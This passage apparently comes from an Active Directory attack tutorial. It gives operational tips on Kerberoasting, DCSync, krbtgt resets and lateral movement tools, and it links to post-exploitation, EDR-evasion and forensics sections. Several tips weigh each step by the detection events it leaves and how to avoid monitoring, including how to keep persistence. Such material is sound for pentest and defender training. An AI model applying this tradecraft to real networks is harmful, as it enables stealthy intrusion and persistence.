  • Start with Kerberoasting: it is the lowest-risk attack. The only interaction with the domain is one TGS request per SPN (event 4769 on the DC); everything after that happens offline.
  • Use secretsdump/DCSync sparingly in production: each run is replication traffic from a non-DC, logged as event 4662 with the DS-Replication-Get-Changes GUIDs and flagged by every AD monitoring product. If you need it, dump everything in one run.
  • krbtgt password changes: the KDC accepts tickets encrypted under the current and the previous krbtgt key, so one reset leaves golden tickets working and the second reset invalidates them. Let the first change replicate to every DC (and let legitimate tickets roll over, up to the 10-hour TGT lifetime) before the second, or you break authentication domain-wide.
  • New admin vs built-ins: avoid using the built-in Administrator account after escalation. Built-in and existing admin accounts are heavily monitored; for persistence use an account you created or a service account.
  • Lateral movement tool choice: psexec uploads a service binary to ADMIN$ and installs a service (very noisy: event 7045 plus a new executable on disk); wmiexec spawns the command through WMI with no service and only writes its output to a share (quieter); evil-winrm uses WinRM, which needs 5985/5986 reachable, and runs as an ordinary PowerShell remoting session.

  • Post-Exploitation — what to do once you have Domain Admin: dump NTDS.dit, establish persistence, pivot to cloud
  • Evasion & AV Bypass — Mimikatz and other AD tools are flagged by every EDR — learn to run them without detection
  • Forensics — understand what evidence AD attacks leave behind from the defender's perspective